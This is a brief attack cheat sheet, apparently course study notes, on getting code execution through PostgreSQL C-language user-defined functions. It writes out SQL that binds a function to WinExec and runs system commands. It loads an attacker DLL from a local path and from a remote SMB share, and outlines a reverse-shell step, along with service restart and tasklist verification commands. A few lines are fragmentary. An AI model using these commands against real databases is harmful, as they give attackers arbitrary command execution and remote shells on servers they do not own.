0. PSQL Extensions attack - UDF

Load an extension using the following.

CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;


CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS 'C:\Windows\System32\kernel32.dll', 'WinExec' LANGUAGE C STRICT;
SELECT system('hostname');

Steps Local attack

  1. Generate awae.dll using the script. poc.c Local execution arking.
  2. Create a function
# From local machine
create or replace function test(text, integer) returns void as $C:\awae.dll$, $awae$ language C strict;
SELECT test($calc.exe$, 3);


# From remote machine
CREATE OR REPLACE FUNCTION remote_test(text, integer) RETURNS void AS $\\192.168.119.120\awae\awae.dll$, $awae$ LANGUAGE C STRICT;
SELECT remote_test($calc.exe$, 3);
  1. Start/Stop the application.
    1. net stop "Applications Manager"
    2. delete the dll file. DLL file is loaded into the database memory space.
    3. net start "Applications Manager"
  2. Delete the test function.
    1. DROP FUNCTION test(text, integer);
  3. Observe calc.exe using tasklist
    1. tasklist |findstr -i calc.exe

Steps Rev shell

  1. Generate payload. psql poc.c - reverseshell
  2. Create a function
create or replace function test2(text) returns void as $C:\awae2.dll$, $connect_back$ language C strict;
  1. Execute the function.
select test2('something')
  1. Python payload.
    Remote execution py